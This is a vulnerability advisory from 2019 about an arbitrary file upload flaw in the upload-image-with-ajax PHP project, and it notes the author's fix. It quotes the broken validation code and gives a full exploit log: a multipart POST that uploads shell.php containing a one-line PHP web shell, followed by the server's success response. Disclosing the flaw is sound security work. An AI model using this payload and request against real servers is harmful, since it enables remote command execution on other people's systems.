Advisory #: 211
Title: Arbitrary file upload vulnerability in upload-image-with-ajax
Author: Larry W. Cashdollar
Date: 2019-12-16
CVE-ID:[CVE-2019-8293]
CWE:
Download Site: https://github.com/abcprintf/upload-image-with-ajax/
Vendor: adcprintf
Vendor Notified: 2019-12-16
Vendor Contact: wh.cprintf@gmail.com
Advisory: http://www.vapidlabs.com/advisory.php?v=211
Description: upload-image-with-ajax
Vulnerability:
The code below changes the $ready flag to true if the file conforms to the size of < 1000000. Reversing the check that the file is an image. So, a .php file can be uploaded with only a warning allowing code execution. $ready = false; if((($imageType == "image/jpeg") || ($imageType == "image/jpg") || ($imageType == "image/png"))&&in_array($fileExt, $validext)){ $ready = true; }else{ echo "was not an image "; /You should abort the upload right here/ } if($_FILES["fileUpload"]["size"] < 1000000){ $ready = true; echo "file size is ".$_FILES['fileUpload']["size"]." "; }else{ echo "file was TOO BIG!"; }
Export: JSON TEXT XML
Exploit Code:
  1. $ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php fileUpload
  2.  
  3.  
  4. POST request size is 482 bytes
  5.  
  6. Sending Payload:
  7. POST /upload-image-with-ajax/upload.php HTTP/1.1
  8. Host: 192.168.0.3
  9. User-Agent: File Upload Exploiter/v1.2
  10. Accept: */*
  11. Content-Length: 251
  12. Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853
  13.  
  14. --------------------------c8e05c8871143853
  15. Content-Disposition: form-data; name="fileUpload"; filename="shell.php"
  16. Content-Type: application/octet-stream
  17.  
  18. <?php $cmd=$_GET['cmd']; system($cmd);?>
  19.  
  20. --------------------------c8e05c8871143853--
  21.  
  22. HTTP/1.1 200 OK
  23. Date: Tue, 24 Dec 2019 12:16:57 GMT
  24. Server: Apache/2.4.25 (Debian)
  25. Vary: Accept-Encoding
  26. Content-Length: 96
  27. Content-Type: text/html; charset=UTF-8
  28.  
  29. was not an image<br><h2> application/octet-stream</h2>file size is 42<br>upload successful!
  30. [+] Total bytes read: 267
Screen Shots:
Notes:
Author fixed vulnerability:  https://github.com/abcprintf/upload-image-with-ajax/commit/71436ba5102010397519d4b25ea57591cfb4974c